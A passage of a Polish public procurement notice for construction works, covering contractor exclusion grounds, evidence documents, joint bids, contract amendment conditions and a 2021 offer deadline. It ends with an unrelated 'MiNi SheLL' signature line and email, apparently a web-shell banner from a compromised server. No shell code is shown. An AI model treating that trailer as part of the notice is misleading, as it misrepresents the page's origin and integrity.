kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od otrzymania wezwania, aktualnych na dzień złożenia,<br/>podmiotowych środków dowodowych, o których mowa poniżej. 1.1. W celu potwierdzenia braku<br/>podstaw wykluczenia z udziału w postępowaniu o udzielenie zamówienia Wykonawca składa:<br/>a) oświadczenie Wykonawcy (sporządzone wg wzoru określonego w załączniku nr 3 do SWZ) – o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 ustawy, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych w pkt. 12.1 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	W przypadku gdy Wykonawca oferuje rozwiązania nieodpowiadające wprost normom referencyjnym opisanym w Programie Funkcjonalno-Użytkowym - Zamawiający wymaga udowodnienia w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art.104-107 ustawy PZP, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. <br/>UWAGA! <br/>W Formularzu oferty (o którym mowa w pkt 18.1. lit a) SWZ) w systemie Zamawiający wymaga wskazania przez Wykonawcę – czy oferuje rozwiązania nieodpowiadające wprost normom referencyjnym opisanym w Programie Funkcjonalno-Użytkowym. Niniejsze informacje nie podlegają uzupełnieniu.<br/>2.	Dokumenty określone w powyższym pkt 1. Ogłoszenia - podlegają uzupełnieniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dokumenty określone w powyższym pkt (Wykaz przedmiotowych środków dowodowych) 1. - podlegają uzupełnieniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>•	postępowania o zamówienie publiczne, którego dotyczy;<br/>•	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;<br/>•	ustanowionego Pełnomocnika oraz zakresu jego umocowania.<br/>3. Dokument pełnomocnictwa musi być podpisany przez Wykonawców wspólnie ubiegających się wspólnie o udzielenie zamówienia, przy czym nie jest wymagany podpis pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz w przypadkach, o których mowa w pkt 12.1.2. SWZ.<br/>5.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 18.2.2. SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te potwierdza brak podstaw wykluczenia.	<br/>6.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć (każdy z nich) aktualne na dzień złożenia podmiotowe środki dowodowe, o których mowa w pkt 18.2.3.1.<br/>7.	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy<br/>1.	Zmiany i uzupełnienia treści niniejszej umowy wymagają pod rygorem nieważności formy pisemnej, w postaci aneksu do umowy i muszą być akceptowane przez obie umawiające się strony.<br/>2.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy chyba, że zachodzi co najmniej jedna z okoliczności opisanych w art. 455 P.z.p., z zastrzeżeniem ust. 3.<br/>3. Wypełniając postanowienia art. 455 P.z.p. Zamawiający oświadcza, że dopuszcza zmiany postanowień umowy określone w ust. 4-19 oraz określa warunki wprowadzenia tych zmian.<br/>4.	Strony mają prawo do przedłużenia terminu zakończenia robót o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót, w następujących sytuacjach:<br/>Z UWAGI NA OGRANICZENIA ZNAKÓW, POZOSTAŁE ZAPISY ZAMIESZCZONO W SEKCJI<br/>IX. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-25 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Uzupełnienie do Sekcji III, pkt.3.6) Ogłoszenia: •Jeżeli w wyniku podpisywania pliku<br/>kwalifikowanym podpisem elektronicznym zostanie utworzony dodatkowy plik z podpisem,<br/>Wykonawca jest zobowiązany przekazać Zamawiającemu oba pliki (plik podpisywany i plik z<br/>podpisem).•Jeżeli w wyniku podpisywania pliku podpisem osobistym lub profilem zaufanym<br/>zostanie utworzony dodatkowy plik z podpisem, Wykonawca jest zobowiązany przekazać<br/>Zamawiającemu oba pliki (plik podpisywany i plik z podpisem).<br/>II. Uzupełnienie do Sekcji VII, pkt 7.4) Ogłoszenia:<br/>1)	jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego przekazania terenu budowy, bądź w wyniku np. zmiany przepisów, które wejdą w życie na etapie realizacji robót, bądź innych sytuacji, za które odpowiedzialności nie ponosi Wykonawca; <br/>2)	jeżeli zmiany dokonane w oparciu o art. 445 P.z.p. spowodują konieczność wykonania robót zamiennych lub dodatkowych, które wstrzymają lub opóźnią realizację przedmiotu umowy o czas niezbędny na wykonanie tych robót; <br/>3)	gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, opinii, do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;<br/>4)	gdy wystąpią przekroczenia zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma – typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty, o kompetencjach zbliżonych do organów administracji, (w szczególności eksploatatorów infrastruktury takich jak Innogy Stoen Operator sp. z o.o., Polska Spółka Gazownictwa S.A., MPWiK w m.st. Warszawie S.A., operatorów sieci telekomunikacyjnych itp.) decyzji, zezwoleń, uzgodnień, opinii, umów, dokumentów wew., których wydanie jest niezbędne do dalszego wykonywania robót przez Wykonawcę, a opóźnienie organów nie wynika z przyczyn leżących po stronie Wykonawcy. <br/>5)	jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy;<br/>6)	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami.<br/>7)	gdy wystąpią niekorzystne, anormalne warunki atmosferyczne uniemożliwiające prowadzenie robót, zgodnie z obowiązującymi polskimi i europejskimi normami budowlanymi. <br/>8) gdy wystąpią odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie nie zinwentaryzowanych lub błędnie zinwentaryzowanych obiektów, w tym sieci lub instalacji;<br/>9)	gdy wystąpią nieprzewidziane w SWZ warunki geologiczne, archeologiczne lub terenowe, które wymagają wstrzymania budowy np.: (niewypały, niewybuchy, wykopaliska archeologiczne, pojedyncze lub masowe groby);<br/>10)	przy wykonaniu podmurówki - przy wystąpieniu temperatury poniżej +5oC lub wilgotności powietrza powyżej 80%, jeżeli wykonanie tego zakresu robót w okresie występowania niekorzystnych warunków atmosferycznych było ujęte w harmonogramie rzeczowo-finansowym,<br/>11)	przy układaniu kostki brukowej - przy wystąpieniu temperatury poniżej +50C lub wilgotności powietrza powyżej 80%, jeżeli wykonanie tego zakresu robót w okresie występowania niekorzystnych warunków atmosferycznych było ujęte w harmonogramie rzeczowo-finansowym,<br/>12)	przy układaniu kostki brukowej – przy występowaniu opadów deszczu powyżej 5 ml/m2, lub długotrwałych opadów śniegu, jeżeli wykonanie tego zakresu robót w okresie występowania niekorzystnych warunków atmosferycznych było ujęte w harmonogramie rzeczowo-finansowym,<br/>Z UWAGI NA OGRANICZENIA ZNAKÓW POZOSTAŁE ZMIANY UMOWY ZAWIERA § 16 PROJEKTOWANYCH POSTANOWIEŃ UMOWY.

Creat By MiNi SheLL
Email: jattceo@gmail.com